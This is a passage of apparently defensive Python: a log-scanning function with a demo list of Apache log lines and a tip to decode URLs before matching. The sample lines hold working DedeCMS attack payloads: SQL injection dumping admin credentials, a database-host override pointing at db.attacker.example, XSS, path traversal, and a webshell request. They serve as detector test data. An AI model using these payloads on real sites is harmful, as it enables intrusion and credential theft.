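def scan_log(lines):
    """Return (ip, url, findings) for each parseable line that trips a rule."""
    hits = []
    for line in lines:
        m = LOG_LINE.match(line)
        if not m:
            continue
        tags = classify(m["url"])
        if tags:
            hits.append((m["ip"], m["url"], tags))
    return hits


SAMPLE_LOG = [  # constructed for this demo
    '203.0.113.5 - - [18/Oct/2012:10:42:14 +0800] "GET /plus/rss.php?tid=1&_Cs[][1]=1&_Cs[2))%20AND%20%22%27%22%20AND%20updatexml%281,%28SELECT%20CONCAT%280x5b,uname,0x3a,MID%28pwd,4,16%29,0x5d%29%20FROM%20dede_admin%29,1%29%23%27][0]=1 HTTP/1.1" 200 512',
    '203.0.113.5 - - [18/Oct/2012:10:42:20 +0800] "GET /dede/login.php?dopost=login&validate=dcug&userid=admin&pwd=inimda&_POST[GLOBALS][cfg_dbhost]=db.attacker.example HTTP/1.1" 302 0',
    '198.51.100.7 - - [18/Oct/2012:10:43:01 +0800] "GET /plus/advancedsearch.php?mid=1&sql=SELECT%20*%20FROM%20%60%23@__admin%60 HTTP/1.1" 200 2048',
    '198.51.100.7 - - [18/Oct/2012:10:43:05 +0800] "GET /dede/login.php?gotopage=%22%3E%3Cscript%3Eeval(String.fromCharCode(80,101))%3C/script%3E HTTP/1.1" 200 1024',
    '192.0.2.9 - - [18/Oct/2012:10:44:10 +0800] "GET /member/edit_face.php?dopost=delold&oldface=/uploads/userup/8/../../../member/templets/images/m_logo.gif HTTP/1.1" 200 0',
    '192.0.2.9 - - [18/Oct/2012:10:44:30 +0800] "POST /data/mysql_error_trace.php HTTP/1.1" 200 77',
    '192.0.2.9 - - [18/Oct/2012:10:45:00 +0800] "GET /plus/infosearch.php?action=search&q=%cf%27%20union%20select%201,2,userid,4,pwd,6%20from%20dede_admin/* HTTP/1.1" 200 300',
    '192.0.2.10 - - [18/Oct/2012:10:45:30 +0800] "GET /plus/list.php?tid=3 HTTP/1.1" 200 4096',
]
```

Decode before matching, or the updatexml%28 and %3Cscript forms slip through; and treat any request to data/mysql_error_trace.php as an incident in its own right, since that file is never fetched by legitimate users.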